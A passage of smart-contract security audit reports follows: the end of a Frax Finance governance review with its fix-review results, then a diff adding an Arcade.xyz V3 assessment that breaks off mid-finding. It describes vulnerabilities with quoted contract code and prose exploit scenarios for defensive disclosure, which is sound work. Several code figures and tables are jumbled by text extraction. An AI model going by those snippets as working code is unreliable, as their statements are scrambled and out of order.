) internal view returns ( uint256 ) { // If lock is expired they have no voting weight if (VE_FXS.locked(voter).end <= timestamp) return 0 ; uint256 firstDelegationTimestamp = $delegations[voter].firstDelegationTimestamp; // Never delegated OR this timestamp is before the first delegation by account if (firstDelegationTimestamp == 0 || timestamp < firstDelegationTimestamp) { try VE_FXS.balanceOf({ addr: voter, _t: timestamp }) returns ( uint256 _balance ) { return _balance; } catch {} } return 0 ; } Figure 7.2: The function that calculates the voting weight in VeFxsVotingDelegation.sol If a voter’s lock has expired or was never created, the short-circuit condition returns zero voting power. This behavior contrasts with the veFxs.balanceOf function, which would return the user’s last locked FXS balance. @external @view def balanceOf (addr: address, _t: uint256 = block.timestamp) -> uint256: """ @notice Get the current voting power for `msg.sender` @dev Adheres to the ERC20 `balanceOf` interface for Aragon compatibility @param addr User wallet address @param _t Epoch time to return voting power at @return User voting power """ _epoch: uint256 = self .user_point_epoch[addr] if _epoch == 0 : return 0 else : last_point: Point = self .user_point_history[addr][_epoch] last_point.bias -= last_point.slope * convert(_t - last_point.ts, int128) if last_point.bias < 0 : last_point.bias = 0 unweighted_supply: uint256 = convert(last_point.bias, uint256) # Original from veCRV weighted_supply: uint256 = last_point.fxs_amt + (VOTE_WEIGHT_MULTIPLIER * unweighted_supply) return weighted_supply Figure 7.1: The balanceOf function in veFXS.vy This divergence should be clearly documented in the code and should be reflected in Frax Finance’s public-facing documentation, which does not mention the fact that an expired lock does not hold any voting power: “Each veFXS has 1 vote in governance proposals. Staking 1 FXS for the maximum time, 4 years, would generate 4 veFXS. This veFXS balance itself will slowly decay down to 1 veFXS after 4 years, [...]”. Exploit Scenario Alice buys FXS to be able to vote on a proposal. She is not aware that she is required to create a lock (even if expired) to have any voting power at all. She is unable to vote for the proposal. Recommendations Short term, modify the VeFxsVotingDelegation contract to reflect the desired voting power curve and/or document whether this is intended behavior. Long term, make sure to keep public-facing documentation up to date when changes are made. +8. Spamming risk in propose functions Severity: Informational Difficulty: Low Type: Configuration Finding ID: TOB-FRAXGOV-8 Target: FraxGovernorAlpha.sol , FraxGovernorBravo.sol Description Anyone with enough veFXS tokens to meet the proposal threshold can submit an unbounded number of proposals to both the FraxGovernorAlpha and FraxGovernorOmega contracts. The only requirement for submitting proposals is that the msg.sender address must have a balance of veFXS tokens larger than the _proposalThreshold value. Once that requirement is met, a user can submit as many proposals as they would like. A large volume of proposals may create difficulties for off-chain monitoring solutions and user-interface interactions. function _requireSenderAboveProposalThreshold() internal view { if (_getVotes(msg.sender, block.timestamp - 1, "") < proposalThreshold()) { revert SenderVotingWeightBelowProposalThreshold(); } } Figure 8.1: The _requireSenderAboveProposalThreshold function, called by the propose function ( FraxGovernorBase.sol#L104-L108 ) Exploit Scenario Mallory has 100,000 voting power. She submits one million proposals with small but unique changes to the description field of each one. The system saves one million unique proposals and emits one million ProposalCreated events. Front-end components and off-chain monitoring systems are spammed with large quantities of data. Recommendations Short term, track and limit the number of proposals a user can have active at any given time. Long term, consider cases of user interactions beyond just the intended use cases for potential malicious behavior. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Decentralization The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades Documentation The presence of comprehensive and readable codebase documentation Front-Running Resistance Low-Level Manipulation The system’s resistance to front-running attacks The justified use of inline assembly and low-level calls Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Multisignature Wallet Best Practices Consensus requirements for sensitive actions, such as spending funds from a wallet, are meant to mitigate the risks of the following: ● ● ● Any one person overruling the judgment of others Failures caused by any one person’s mistake Failures caused by the compromise of any one person’s credentials For example, in a 2-of-3 multisignature wallet, the authority to execute a “spend” transaction would require a consensus of two individuals in possession of two of the wallet’s three private keys. For this model to be useful, the following conditions are required : 1. The private keys must be stored or held separately, and access to each one must be limited to a unique individual. 2. 3. If the keys are physically held by third-party custodians (e.g., a bank), multiple keys should not be stored with the same custodian. (Doing so would violate requirement #1.) The person asked to provide the second and final signature on a transaction (i.e., the co-signer) should refer to a pre-established policy specifying the conditions for approving the transaction by signing it with his or her key. 4. The co-signer should also verify that the half-signed transaction was generated willingly by the intended holder of the first signature’s key. Requirement #3 prevents the co-signer from becoming merely a “deputy” acting on behalf of the first signer (forfeiting the decision-making responsibility to the first signer and defeating the security model). If the co-signer can refuse to approve the transaction for any reason, the due-diligence conditions for approval may be unclear. That is why a policy for validating transactions is needed. A verification policy could include the following: ● ● ● A protocol for handling a request to co-sign a transaction (e.g., a half-signed transaction will be accepted only via an approved channel) An allowlist of specific addresses allowed to be the payee of a transaction A limit on the amount of funds spent in a single transaction or in a single day Requirement #4 mitigates the risks associated with a single stolen key. For example, say that an attacker somehow acquired the unlocked Ledger Nano S of one of the signatories. A voice call from the co-signer to the initiating signatory to confirm the transaction would reveal that the key had been stolen and that the transaction should not be co-signed. If the signatory were under an active threat of violence, he or she could use a duress code (a code word, a phrase, or another signal agreed upon in advance) to covertly alert the others that the transaction had not been initiated willingly, without alerting the attacker. D. Code Quality Findings This appendix lists a finding that is not associated with specific vulnerabilities. GovernorCountingFractional ● Update the GovernorCountingFractional contract to import Frax Finance’s modified Governor.sol contract. GovernorCountingFractional imports the unmodified OpenZeppelin Governor contract, though it does not use it directly or inherit from it. In the event of more extensive future modifications, it may become unclear to readers or tooling which Governor contract should be correctly referenced. E. Incident Response Plan Recommendations This section provides recommendations on formulating an incident response plan. ● ● ● ● Identify the parties (either specific people or roles) responsible for implementing the mitigations when an issue occurs (e.g., deploying smart contracts, pausing contracts, upgrading the front end, etc.). Clearly describe the intended contract deployment process. Outline the circumstances under which Frax Finance will compensate users affected by an issue (if any). ○ Issues that warrant compensation could include an individual or aggregate loss or a loss resulting from user error, a contract flaw, or a third-party contract flaw. Document how the team plans to stay up to date on new issues that could affect the system; awareness of such issues will inform future development work and help the team secure the deployment toolchain and the external on-chain and off-chain services that the system relies on. ○ Identify sources of vulnerability news for each language and component used in the system, and subscribe to updates from each source. Consider creating a private Discord channel in which a bot will post the latest vulnerability news; this will provide the team with a way to track all updates in one place. Lastly, consider assigning certain team members to track news about vulnerabilities in specific components of the system. ● Determine when the team will seek assistance from external parties (e.g., auditors, affected users, other protocol developers, etc.) and how it will onboard them. ○ Effective remediation of certain issues may require collaboration with external parties. ● Define contract behavior that would be considered abnormal by off-chain monitoring solutions. It is best practice to perform periodic dry runs of scenarios outlined in the incident response plan to find omissions and opportunities for improvement and to develop “muscle memory.” Additionally, document the frequency with which the team should perform dry runs of various scenarios, and perform dry runs of more likely scenarios more regularly. Create a template to be filled out with descriptions of any necessary improvements after each dry run. J. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On June 28, 2023 , reviewed the fixes and mitigations implemented by the Frax Finance team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the eight issues described in this report, Frax Finance has resolved four issues, has partially resolved one issue, and has not resolved the remaining three issues. For additional information, please see the Detailed Fix Review Results below. ID Title Severity Status 1 Race condition in FraxGovernorOmega target validation High Resolved 2 Vulnerable project dependency Undetermined Resolved 3 Replay protection missing in castVoteWithReasonAndParamsBySig Medium Resolved 4 Ability to lock any user’s tokens using deposit_for Informational Unresolved Detailed Fix Review Results TOB-FRAXGOV-1: Race condition in FraxGovernorOmega target validation Resolved in commit ed4e708 . The propose function has been updated in the FraxGovernanceOmega contract to revert whenever it is called. This update will prevent a proposal from being submitted that would interact with a safe that is pending approval to join the allowlist in FraxGovernanceAlpha . TOB-FRAXGOV-2: Vulnerable project dependency Resolved in commit ed4e708 . The vulnerable project dependency cited in this issue has been updated to a version where the vulnerability has been resolved. TOB-FRAXGOV-3: Replay protection missing in castVoteWithReasonAndParamsBySig Resolved in commit 00d0b07 . The castVoteWithReasonAndParamsBySig function has been updated to include a nonce value in the checked signature. If a malicious actor tried to reuse the same signature to cast the targeted users remaining voting weight, the transaction would revert. TOB-FRAXGOV-4: Ability to lock any user’s tokens using deposit_for Not resolved. Frax Finance provided the following statement about this issue: This issue has been communicated to partners and users; mitigated by avoiding excessive approvals. TOB-FRAXGOV-5: The relay function can be used to call critical safe functions Resolved in commit 00d0b07 . The relay function has been updated in the Governor contract to revert whenever it is called. Furthermore, the propose function has been updated to revert whenever it is called, so the attack vector for this issue has been removed by both of these updates. TOB-FRAXGOV-6: Votes can be delegated to contracts Not resolved. Frax Finance provided the following statement about this issue: This behavior is intended. TOB-FRAXGOV-7: Lack of public documentation regarding voting power expiry Not resolved. Frax Finance provided the following statement about this issue: This will be addressed in documentation. TOB-FRAXGOV-8: Spamming risk in propose functions Partially resolved in commit ed4e708 . The propose function has been updated in the FraxGovernanceOmega contract to revert whenever it is called. However, in the FraxGovernanceAlpha contract it is still possible for a user to spam the propose function so long as the caller meets the proposal threshold. Frax Finance provided the following statement about this issue: This will be mitigated via minimum proposal voting power requirements configured during deployment. diff --git a/findings_newupdate/tob/2023-07-arcade-securityreview.txt b/findings_newupdate/tob/2023-07-arcade-securityreview.txt new file mode 100644 index 0000000..e4866b1 --- /dev/null +++ b/findings_newupdate/tob/2023-07-arcade-securityreview.txt @@ -0,0 +1,35 @@ +2. Solidity compiler optimizations can be problematic Severity: Undetermined Difficulty: High Type: Undefined Behavior Finding ID: TOB-ARCADE-2 Target: hardhat.config.ts Description Arcade has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler, the optional optimizations may not be safe. 147 148 149 150 optimizer: { enabled: optimizerEnabled, runs: 200, }, Figure 2.1: The solc optimizer settings in arcade-protocol/hardhat.config.ts High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018; the fix for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. Another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that future optimizations will introduce new bugs. Exploit Scenario A latent or future bug in Solidity compiler optimizations—or in the Emscripten transpilation to solc-js—causes a security vulnerability in the Arcade contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. 25 Arcade.xyz V3 Security Assessment +3. callApprove does not follow approval best practices Severity: Informational Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-ARCADE-3 Target: contracts/vault/AssetVault.sol Description The AssetVault.callApprove function has undocumented behaviors and lacks the increase/decrease approval functions, which might impede third-party integrations. A well-known race condition exists in the ERC-20 approval mechanism. The race condition is enabled if a user or smart contract calls approve a second time on a spender that has already been allowed. If the spender sees the transaction containing the call before it has been mined, they can call transferFrom to transfer the previous value and then still receive authorization to transfer the new value. To mitigate this, AssetVault uses the SafeERC20.safeApprove function, which will revert if the allowance is updated from nonzero to nonzero. However, this behavior is not documented, and it might break the protocol’s integration with third-party contracts or off-chain components. 282 283 284 285 286 287 288 289 290 291 292 293 294 295 37 38 39 40 41 42 function callApprove( address token, address spender, uint256 amount ) external override onlyAllowedCallers onlyWithdrawDisabled nonReentrant { if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) { revert AV_NonWhitelistedApproval(token, spender); } // Do approval IERC20(token).safeApprove(spender, amount); emit Approve(msg.sender, token, spender, amount); } Figure 3.1: The callApprove function in arcade-protocol/contracts/vault/AssetVault.sol /** * @dev Deprecated. This function has issues similar to the ones found in * {IERC20-approve}, and its usage is discouraged. * * Whenever possible, use {safeIncreaseAllowance} and * {safeDecreaseAllowance} instead. 26 Arcade.xyz V3 Security Assessment */ function safeApprove( IERC20 token, address spender, uint256 value ) internal { 43 44 45 46 47 48 49 50 51 52 53 54 55 56 spender, value)); 57 } // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), "SafeERC20: approve from non-zero to non-zero allowance" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, Figure 3.2: The safeApprove function in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol An alternative way to mitigate the ERC-20 race condition is to use the increaseAllowance and decreaseAllowance functions to safely update allowances. These functions are widely used by the ecosystem and allow users to update approvals with less ambiguity. uint256 newAllowance = token.allowance(address(this), spender) + value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, } ) internal { function safeIncreaseAllowance( function safeDecreaseAllowance( IERC20 token, address spender, uint256 value 59 60 61 62 63 64 65 spender, newAllowance)); 66 67 68 69 70 71 72 73 74 75 zero"); 76 77 abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); 78 79 uint256 newAllowance = oldAllowance - value; _callOptionalReturn(token, IERC20 token, address spender, uint256 value ) internal { unchecked { } } uint256 oldAllowance = token.allowance(address(this), spender); require(oldAllowance >= value, "SafeERC20: decreased allowance below Figure 3.3: The safeIncreaseAllowance and safeDecreaseAllowance functions in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol 27 Arcade.xyz V3 Security Assessment Exploit Scenario Alice, the owner of an asset vault, sets up an approval of 1,000 for her external contract by calling callApprove. She later decides to update the approval amount to 1,500 and again calls callApprove. This second call reverts, which she did not expect. Recommendations Short term, take one of the following actions: ● Update the documentation to make it clear to users and other integrating smart contract developers that two transactions are needed to update allowances. ● Add two new functions in the AssetVault contract: callIncreaseAllowance and callDecreaseAllowance, which internally call SafeERC20.safeIncreaseAllowance and SafeERC20.safeDecreaseAllowance, respectively. Long term, when using external libraries/contracts, always ensure that they are being used correctly and that edge cases are explained in the documentation. 28 Arcade.xyz V3 Security Assessment +4. Risk of confusing events due to missing checks in whitelist contracts Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-4 Target: contracts/vault/CallWhitelist.sol, contracts/vault/CallWhitelistDelegation.sol Description The CallWhitelist contract’s add and remove functions do not check whether the given call has been registered in the whitelist. As a result, add could be used to register calls that have already been registered, and remove could be used to remove calls that have never been registered; these types of calls would still emit events. For example, invoking remove with a call that is not in the whitelist would emit a CallRemoved event even though no call was removed. Such an event could confuse off-chain monitoring systems, or at least make it more difficult to retrace what happened by looking at the emitted event. 64 65 66 67 function add(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = true; emit CallAdded(msg.sender, callee, selector); } Figure 4.1: The add function in arcade-protocol/contracts/vault/CallWhitelist.sol 75 76 77 78 function remove(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = false; emit CallRemoved(msg.sender, callee, selector); } Figure 4.2: The remove function in arcade-protocol/contracts/vault/CallWhitelist.sol A similar problem exists in the CallWhitelistDelegation.setRegistry function. This function can be called to set the registry address to the current registry address. In that case, the emitted RegistryChanged event would be confusing because nothing would have actually changed. 85 86 87 88 89 function setRegistry(address _registry) external onlyOwner { registry = IDelegationRegistry(_registry); emit RegistryChanged(msg.sender, _registry); } 29 Arcade.xyz V3 Security Assessment Figure 4.3: The setRegistry function in arcade-protocol/contracts/vault/CallWhitelistDelegation.sol Arcade has explained that the owner of the whitelist contracts in Arcade V3 will be a (set of) governance contract(s), so it is unlikely that this issue will happen. However, it is possible, and it could be prevented by more validation. Exploit Scenario No calls have yet been added to the whitelist in CallWhitelist. Through the governance system, a proposal to remove a call with the address 0x1 and the selector 0x12345678 is approved. The proposal is executed, and CallWhitelist.remove is called. The transaction succeeds, and a CallRemoved event is emitted, even though the “removed” call was never in the whitelist in the first place. Recommendations Short term, add validation to the add, remove, and setRegistry functions. For the add function, it should ensure that the given call is not already in the whitelist. For the remove function, it should ensure that the call is currently in the whitelist. For the setRegistry function, it should ensure that the new registry address is not the current registry address. Adding this validation will prevent confusing events from being emitted and ease the tracing of events in the whitelist over time. Long term, when dealing with function arguments, always ensure that all inputs are validated as tightly as possible and that the subsequent emitted events are meaningful. Additionally, consider setting up an off-chain monitoring system that will track important system events. Such a system will provide an overview of the events that occur in the contracts and will be useful when incidents occur. 30 Arcade.xyz V3 Security Assessment +5. Missing checks of _exists() return value Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-5 Target: contracts/PromissoryNote.sol, contracts/vault/VaultFactory.sol Description The ERC-721 _exists() function returns a Boolean value that indicates whether a token with the specified tokenId exists. In two instances in Arcade’s codebase, the function is called but its return value is not checked, bypassing the intended result of the existence check. In particular, in the PromissoryNote.tokenURI() and VaultFactory.tokenURI() functions, _exists() is called before the URI for the tokenId is returned, but its return value is not checked. If the given NFT does not exist, the URI returned by the tokenURI() function will be incorrect, but this error will not be detected due to the missing return value check on _exists(). 165 function tokenURI(uint256 tokenId) public view override(INFTWithDescriptor, ERC721) returns (string memory) { 166 167 168 169 } _exists(tokenId); return descriptor.tokenURI(address(this), tokenId); Figure 5.1: The tokenURI function in arcade-protocol/contracts/PromissoryNote.sol 48 function tokenURI(address, uint256 tokenId) external view override returns (string memory) { 49 return bytes(baseURI).length > 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ""; 50 } Figure 5.2: The tokenURI function in arcade-protocol/contracts/nft/BaseURIDescriptor.sol Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that lists users' promissory notes and vaults with their respective URIs. He accidentally passes a nonexistent tokenId to tokenURI(), causing his application to show an incorrect or incomplete URI. 31 Arcade.xyz V3 Security Assessment Recommendations Short term, add a check for the _exists() function’s return value to both of the tokenURI() functions to prevent them from returning an incomplete URI for nonexistent tokens. Long term, add new test cases to verify the expected return values of tokenURI() in all contracts that use it, with valid and invalid tokens as arguments. 32 Arcade.xyz V3 Security Assessment +6. Incorrect deployers in integration tests Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-ARCADE-6 Target: test/Integration.ts Description The fixture deployment function in the provided integration tests uses different signers for deploying the Arcade contracts before performing the tests. All Arcade contracts are meant to be deployed by the protocol team, except for vaults, which are deployed by users using the VaultFactory contract. However, in the fixture deployment function, some contracts are deployed from the borrower account instead of the admin account. Some examples are shown in figure 6.1; however, there are other instances in which contracts are not deployed from the admin account. const whitelist = await deploy("CallWhitelist", signers[0], const signers: SignerWithAddress[] = await ethers.getSigners(); const [borrower, lender, admin] = signers; 71 72 73 74 []); 75 76 77 signers[0], [BASE_URI]) 78 [vaultTemplate.address, whitelist.address, feeController.address, descriptor.address]); const vaultTemplate = await deploy("AssetVault", signers[0], []); const feeController = await deploy("FeeController", admin, []); const descriptor = await deploy("BaseURIDescriptor", const vaultFactory = await deploy("VaultFactory", signers[0], Figure 6.1: A snippet of the tests in arcade-protocol/test/Integration.ts Exploit Scenario Alice, a developer on the Arcade team, adds a new permissioned feature to the protocol. She adds the relevant integration tests for her feature, and all tests pass. However, because the deployer for the test contracts was not the admin account, those tests should have failed, and the contracts are deployed to the network with a bug. Recommendations Short term, correct all of the instances of incorrect deployers for the contracts in the integration tests file. 33 Arcade.xyz V3 Security Assessment Long term, add additional test cases to ensure that the account permissions in all deployed contracts are correct. 34 Arcade.xyz V3 Security Assessment +7. Risk of out-of-gas revert due to use of transfer() in claimFees Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-ARCADE-7 Target: contracts/vault/VaultFactory.sol Description The VaultFactory.claimFees function uses the low-level transfer() operation to move the collected ETH fees to another arbitrary address. The transfer() operation sends only 2,300 units of gas with this operation. As a result, if the recipient is a contract with logic inside the receive() function, which would use extra gas, the operation will probably (depending on the gas cost) fail due to an out-of-gas revert. 194 195 196 197 198 199 function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 7.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol The Arcade team has explained that the recipient will be a treasury contract with no logic inside the receive() function, meaning the current use of transfer() will not pose any problems. However, if at some point the recipient does contain logic inside the receive() function, then claimFees will likely revert and the contract will not be able to claim the funds. Note, however, that the fees could be claimed by another address (i.e., the fees will not be stuck). The withdrawETH function in the AssetVault contract uses Address.sendValue instead of transfer(). function withdrawETH(address to) external override onlyOwner 223 onlyWithdrawEnabled nonReentrant { 224 225 226 227 228 // perform transfer uint256 balance = address(this).balance; payable(to).sendValue(balance); emit WithdrawETH(msg.sender, to, balance); } 35 Arcade.xyz V3 Security Assessment Figure 7.2: The withdrawETH function in arcade-protocol/contracts/vault/AssetVault.sol Address.sendValue internally uses the call() operation, passing along all of the remaining gas, so this function could be a good candidate to replace use of transfer() in claimFees. However, doing so could introduce other risks like reentrancy attacks. Note that neither the withdrawETH function nor the claimFees function is currently at risk of reentrancy attacks. Exploit Scenario Alice, a developer on the Arcade team, deploys a new treasury contract that contains an updated receive() function that also writes the received ETH amount into a storage array in the treasury contract. Bob, whose account has the FEE_CLAIMER_ROLE role in the VaultFactory contract, calls claimFees with the newly deployed treasury contract as the recipient. The transaction fails because the write to storage exceeds the passed along 2,300 units of gas. Recommendations Short term, consider replacing the claimFees function’s use of transfer() with Address.sendValue; weigh the risk of possibly introducing vulnerabilities like reentrancy attacks against the benefit of being able to one day add logic in the fee recipient’s receive() function. If the decision is to have claimFees continue to use transfer(), update the NatSpec comments for the function so that readers will be aware of the 2,300 gas limit on the fee recipient. Long term, when deciding between using the low-level transfer() and call() operations, consider how malicious smart contracts may be able to exploit the lack of limits on the gas available in the recipient function. Additionally, consider the likelihood that the recipient will be a smart wallet or multisig (or other smart contract) with logic inside the receive() function, as the 2,300 gas from transfer() might not be sufficient for those recipients. 36 Arcade.xyz V3 Security Assessment +8. Risk of lost funds due to lack of zero-address check in functions Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-8 Target: contracts/vault/VaultFactory.sol, contracts/RepaymentController.sol, contracts/LoanCore.sol Description The VaultFactory.claimFees (figure 8.1), RepaymentController.redeemNote (figure 8.2), LoanCore.withdraw, and LoanCore.withdrawProtocolFees functions are all missing a check to ensure that the to argument does not equal the zero address. As a result, these functions could transfer funds to the zero address. 194 195 196 197 198 199 function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 8.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 126 127 128 129 130 RC_InvalidState(data.state); 131 132 133 134 BASIS_POINTS_DENOMINATOR; 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 8.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario A script that is used to periodically withdraw the protocol fees (calling LoanCore.withdrawProtocolFees) is updated. Due to a mistake, the to argument is left 37 Arcade.xyz V3 Security Assessment uninitialized. The script is executed, and the to argument defaults to the zero address, causing withdrawProtocolFees to transfer the protocol fees to the zero address. Recommendations Short term, add a check to verify that to does not equal the zero address to the following functions: ● VaultFactory.claimFees ● RepaymentController.redeemNote ● LoanCore.withdraw ● LoanCore.withdrawProtocolFees Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the project’s CI pipeline, pre-commit hooks, or build scripts. 38 Arcade.xyz V3 Security Assessment +9. The maximum value for FL_09 is not set by FeeController Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-9 Target: contracts/FeeController.sol Description The FeeController constructor initializes all of the maximum values for the fees defined in the FeeLookups contract except for FL_09 (LENDER_REDEEM_FEE). Because the maximum value is not set, it is possible to set any amount, with no upper bound, for that particular fee. The lender's redeem fee is used in RepaymentController’s redeemNote function to calculate the fee paid by the lender to the protocol in order to receive their funds back. If the protocol team accidentally sets the fee to 100%, all of the users' funds to be redeemed would instead be used to pay the protocol. 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 constructor() { /// @dev Vault mint fee - gross maxFees[FL_01] = 1 ether; /// @dev Origination fees - bps maxFees[FL_02] = 10_00; maxFees[FL_03] = 10_00; /// @dev Rollover fees - bps maxFees[FL_04] = 20_00; maxFees[FL_05] = 20_00; /// @dev Loan closure fees - bps maxFees[FL_06] = 10_00; maxFees[FL_07] = 50_00; maxFees[FL_08] = 10_00; } Figure 9.1: The constructor in arcade-protocol/contracts/FeeController.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); 126 127 128 129 130 RC_InvalidState(data.state); 131 if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); 39 Arcade.xyz V3 Security Assessment if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 132 133 134 BASIS_POINTS_DENOMINATOR; 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 9.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario Charlie, a member of the Arcade protocol team, has access to the privileged account that can change the protocol fees. He wants to set LENDERS_REDEEM_FEE to 5%, but he accidentally types a 0 and sets it to 50%. Users can now lose half of their funds to the new protocol fee, causing distress and lack of trust in the team. Recommendations Short term, set a maximum boundary for the FL_09 fee in FeeController’s constructor. Long term, improve the test suite to ensure that all fee-changing functions test for out-of-bounds values for all fees, not just FL_02. 40 Arcade.xyz V3 Security Assessment +10. Fees can be changed while a loan is active Severity: Low Type: Timing Difficulty: High Finding ID: TOB-ARCADE-10 Target: contracts/FeeController.sol Description All fees in the protocol are calculated using the current fees, as informed by the FeeController contract. However, fees can be changed by the team at any time, so the effective rollover and closure fees that the users will pay can change once their loans are already initialized; therefore, these fees are impossible to know in advance. For example, in the code shown in figure 10.1, the LENDER_INTEREST_FEE and LENDER_PRINCIPAL_FEE values are read when a loan is about to be repaid, but these values can be different from the values the user agreed to when the loan was initialized. The same can happen in OriginationController and other functions in RepaymentController. function _prepareRepay(uint256 loanId) internal view returns (uint256 LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); if (data.state == LoanLibrary.LoanState.DUMMY_DO_NOT_USE) revert if (data.state != LoanLibrary.LoanState.Active) revert 149 amountFromBorrower, uint256 amountToLender) { 150 151 RC_CannotDereference(loanId); 152 RC_InvalidState(data.state); 153 154 155 156 terms.proratedInterestRate); 157 158 BASIS_POINTS_DENOMINATOR; 159 BASIS_POINTS_DENOMINATOR; 160 161 162 163 } LoanLibrary.LoanTerms memory terms = data.terms; uint256 interest = getInterestAmount(terms.principal, uint256 interestFee = (interest * feeController.get(FL_07)) / uint256 principalFee = (terms.principal * feeController.get(FL_08)) / amountFromBorrower = terms.principal + interest; amountToLender = amountFromBorrower - interestFee - principalFee; Figure 10.1: The _prepareRepay function in arcade-protocol/contracts/RepaymentController.sol 41 Arcade.xyz V3 Security Assessment Exploit Scenario Lucy, the lender, and Bob, the borrower, agree on the current loan conditions and fees at a certain point in time. Some weeks later, when the time comes to repay the loan, they learn that the protocol team decided to change the fees while their loan was active. Lucy’s earnings are now different from what she expected. Recommendations Short term, consider storing (for example, in the LoanTerms structure) the fee values that both counterparties agree on when a loan is initialized, and use those local values for the full lifetime of the loan. Long term, document all of the conditions that are agreed on by the counterparties and that should be constant during the lifetime of the loan, and make sure they are preserved. Add a specific integration or fuzzing test for these conditions. 42 Arcade.xyz V3 Security Assessment +11. Asset vault nesting can lead to loss of assets Severity: Low Difficulty: High Type: Access Controls Finding ID: TOB-ARCADE-11 Target: contracts/vault/VaultFactory.sol, contracts/vault/AssetVault.sol Description Allowing asset vaults to be nested (e.g., vault A is owned by vault B, and vault B is owned by vault X, etc.) 